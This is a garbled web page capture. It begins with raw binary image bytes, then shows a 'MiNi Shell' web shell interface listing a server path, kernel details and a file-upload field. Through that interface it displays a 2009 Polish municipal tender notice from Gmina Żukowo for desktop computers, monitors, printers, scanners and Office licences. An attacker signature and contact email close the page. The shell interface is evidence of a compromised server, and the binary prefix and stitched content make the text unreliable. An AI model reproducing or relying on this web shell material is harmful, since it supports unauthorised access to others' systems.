JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090319/69756-N-2009.html

<p class="kh_header"><b>Żukowo: Dostawa sprzętu komputerowego i oprogramowania</b><br>
<b>Numer ogłoszenia: 69756 - 2009; data zamieszczenia: 19.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowo , ul. Gdańska 52, 83-330 Żukowo, woj. pomorskie, tel. +48 58 6858300, faks +48 58 6858300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego i oprogramowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia   informacje szczegółowe:
KOMPUTERY STACJONARNE: 
PODZESPÓŁ:	SPECYFIKACJA TECHNICZNA:
Chipset płyty głównej	Rekomendowany przez producenta procesora
Procesor	dedykowany do pracy w komputerach stacjonarnych;
taktowany zegarem o częstotliwości min 2,5 GHz; 
pamięć cache drugiego poziomu min. 2 MB
Zainstalowana pamięć operacyjna RAM	1GB DDR2 800MHz 
Rodzaj pamięci RAM	DDR2 800MHz, 4 gniazda DIMM, możliwość rozbudowy do 16GB dwa sloty wolne dla zapewnienia dalszej rozbudowy
Wolne wewnętrzne gniazda rozszerzeń	2x PCI Express x 16, 1x PCI Express x 1, 3x PCI
Porty	dostępne z przodu obudowy: 2xUSB 2.0, wyjście słuchawek
	dostępne z tyłu obudowy: 6xUSB 2.0, 1x szeregowy, 1xszregowy opcjonalnie, 1x równoległy LPT dopuszczalny na karcie rozszerzeń PCI, 2x PS 2, 1x VGA, 1x Display Port, wyjście audio, wejście audio, RJ45 karta sieciowa
	dostępne wewnątrz obudowy: 2xUSB 2.0
Wnęki rozszerzeń	2 wewnętrzne 3,5, 1 zewnętrzne 3,5, 3 zewnętrzne 5,25
Sterownik dysku twardego	SATA II, dla czterech urządzeń
Dysk twardy	Minimum 160 GB min. SATA II; min. 7200 rpm z NCQ i Smart IV
Napędy wbudowane	Nagrywarka DVD: DVD RW Super Multi Dual Layer SATA
Karta dźwiękowa	zintegrowana, AC 97 wbudowany głośnik wewnętrzny
Karta graficzna	zintegrowana
Karta sieciowa	zintegrowana, 10 100 1000
	
Mysz	Mysz optyczna  dwuprzyciskowa, rolka scroll jako trzeci przycisk
Klawiatura	Klawiatura w układzie polski programisty
Obudowa wymiary wys. x szer. x dł. 	MiniTower  fabrycznie przystosowana do pracy w poziomie rozwiązanie w pełni wspierane przez producenta komputera dostarczony wszystkie elementy potrzebne do zmiany położenia obudowy
	Bez narzędziowe bez konieczności odkręcania jakichkolwiek śrub otwieranie obudowy oraz wymiana napędów optycznych, dysku twardego, kart rozszerzeń, możliwość zastosowania zamka elektromagnetycznego oraz czujnika otwarcia obudowy ze zintegrowaną w BIOS obsługą
Bezpieczeństwo	Hasło użytkownika i administratora w BIOS, PowerOnPassword,  możliwość startu systemu z urządzeń USB, układ szyfrujący na płycie głównej pozwalającego m.in. na przechowywanie w nim kluczy szyfrujących, układ zgodny ze specyfikacją TCG 1.2 zapewniający blokowanie sekwencji startowej komputera i inicjalizacji BIOS
	Możliwość  tworzenia kopii zapasowych lokalnie na dedykowanej partycji dysku na nośnikach dyskach sieciowych i odzyskiwanie zarówno pojedynczych plików jak również całego systemu operacyjnego
	Wbudowana technologia zarządzania i monitorowania komputerem na poziomie
	sprzętowym, spełniająca wymogi:
	a monitorowanie stanu komponentów komputera - CPU, Pamięć, HDD, itp, wersje
	BIOS, płyty głównej,
	b zdalna konfiguracja BIOSu, zdalny update BIOSu, zdalne przejęcie konsoli tekstowej
	systemu, przekierowanie procesu ładowania systemu operacyjnego z wirtualnego CD ROM lub FDD w serwerze zarządzającym.
	c  wbudowana pamięć nie ulotna, pozwalająca na zapis i przechowywanie
	informacji o wersji wersja, zainstalowane updaty, sygnatury wirusów, itp.
	zainstalowanego oprogramowania i zdalny odczyt tych informacji,
	Zintegrowana z BIOS obsługa czytnika kart procesorowych wymuszająca autentykację przed uruchomieniem systemu operacyjnego
Zasilacz	co najmniej 360W z aktywnym PFC o sprawności co najmniej 85%
Głośność	22dB, pomiar zgodny z normą ISO 9296 ISO 7779;
	wymaga się dostarczenia odpowiedniego certyfikatu lub deklaracji producenta
Dopuszcza się dokumenty techniczne w języku angielskim
System operacyjny	Licencja na Windows Vista Busiines PL z prawem używania Windows XP Professinal, system XP PRO preinstalowany fabrycznie przez producenta komputera, dostarczone nośniki ze wszystkimi niezbędnymi do poprawnej pracy sterownikami zarówno do Windows Vista Business jak i do Windows XP Professional. 
Certyfiakty	Potwierdzenie kompatybilności komputera na stronie Microsoft Windows Hardware Compatibility List na daną platformę systemową wydruk ze strony
Deklaracja zgodności CE;
Certyfikaty jakości ISO 9001 i 14001;
Dopuszcza się dokumenty techniczne w języku angielskim
ILOŚĆ:	24 szt.

SPRZĘT:	SPECYFIKACJA TECHNICZNA:	ILOŚĆ
MONITOR LCD 17 cali tego samego producenta co komputer 	17 LCD , 1280 1024 pikseli
Kontrast:  minimum 800:1
Jasność: min 300cd m2
Kąt widzenia pionowy  poziomy: 160  160 stopni
Typ sygnału: D-sub oraz DVI
Certyfikaty: CE, Energy Star,, TCO-03, ISO 13406-2, MPR-II, TUV GS
Typ gniazda wejściowego: 15PIN D-SUB oraz DVI-D
Wbudowany HUB USB min 2 porty USB2.0
Wymagane: PIVOT, regulacja wysokości monitora, możliwość pochylenia panela, obracana podstawa	11 szt.

SPRZĘT:	SPECYFIKACJA TECHNICZNA:	ILOŚĆ
DRUKARKA LASEROWA
MONOCHROMATYCZNA A4
	Interfejs: USB 2.0 i Lan RJ45
Rozdzielczość w pionie: 1200 dpi
Rozdzielczość w poziomie: 1200 dpi
Druk dwustronny automatyczny Duplex  Tak
Normatywne obciążenie miesięczne: około 50.000 stron
Prędkość drukowania w trybie normal: minimum 25 stron min.
Pamięć: minimum 128 MB z możliwością rozbudowy do 384MB
Język drukarki: min PCL6
Pojemność podajnika papieru: minimum 300 arkuszy
Podajnik wielofunkcyjny: na min 50 arkuszy
Taca odbiorcza: min 150 arkuszy
Prędkość procesora: min 600MHz
Dodatkowo: zainstalowany Automatyczny Duplex
Zgodność: z WinME 2000 XP Server2003	15 szt.


OPROGRAMOWANIE	OPIS:	ILOŚĆ
	Microsoft OEM Office Basic Edition 2007 Polish	24 szt.

SPRZĘT:	SPECYFIKACJA TECHNICZNA:	ILOŚĆ
SKANER A4
z podajnikiem papieru
	typ skanera: kolorowy skaner płaski;
rozdzielczość optyczna pionowa: 2400dpi;
rozdzielczość optyczna w poziomie: 2400dpi;
rozdzielczość interpolowana: nieograniczona dpi;
wewnętrzna głębia koloru: 48 bitów;
zewnętrzna głębia koloru: 48 bitów;
głębia szarości: 8 bitów;
Pojemność automatycznego podajnika dokumentów: 50 arkuszy;
maks. długość szerokość skanowania: A4  letter  216 x 296mm 
zainstalowane opcje: Automatyczny podajnik dokumentów
interfejs: USB 2.0	2 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.21.61.10-0, 30.23.21.30-4, 30.23.21.10-8, 48.00.00.00-8, 32.42.00.00-3, 30.23.13.00-0, 30.21.33.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:

a)	spełniają warunki udziału w postępowaniu zgodnie z  art. 22 ust. 1 ustawy - prawo zamówień publicznych, w tym:
- w ciągu ostatnich trzech lat , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwie dostawy sprzętu komputerowego i oprogramowania o wartości powyżej 50.000,00PLN brutto;
b)	nie podlegają wykluczeniu na podstawie art. 24 ustawy - prawo zamówień publicznych.



4.	Ocena spełnienia przez wykonawcę warunków udziału w postępowaniu zostanie przeprowadzona w oparciu o oświadczenia i dokumenty złożone przez wykonawcę. Ocena wykonawców, którzy złożą oferty oparta będzie na zasadzie spełnia / nie spełnia w odniesieniu do wszystkich warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wraz z OFERTĄ  (załącznik nr 1) wykonawcy składają niżej wymienione dokumenty:
1)	oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania 
na podstawie art. 24 ust. 1 ustawy - prawo zamówień publicznych (załącznik nr 2), 
2)	oświadczenie wykonawcy, że spełnia warunki udziału w postępowaniu 
o których mowa w art. 22 ust. 1 pkt. 1 - 3 ustawy - prawo zamówień publicznych (załącznik nr 3) oraz zobowiązania innych podmiotów (ZOBOWIĄZANIE- załącznik nr 4), które udostępnią potencjał techniczny i / lub osoby do realizacji zamówienia, 
3)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4)	wykaz dostaw zrealizowanych w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o podobnym charakterze z zakresem niniejszego zamówienia i odpowiadających przedmiotowi wraz z dokumentami potwierdzającymi, że dostawy zostały wykonane należycie. Pod pojęciem zamówienia zrealizowanego w podanym okresie należy rozumieć zamówienie zakończone i odebrane w w/w okresie (załącznik nr 5)
5)	Formularz oświadczenia o akceptacji umowy (załącznik nr 6)

2.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 3) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;  
2)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej,  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zukowo.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędzie Gminy w Żukowie ul. Gdańska 52 w pokoju nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 11:30, miejsce: Urzędzie Gminy w Żukowie ul. Gdańska 52 w pokoju nr 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com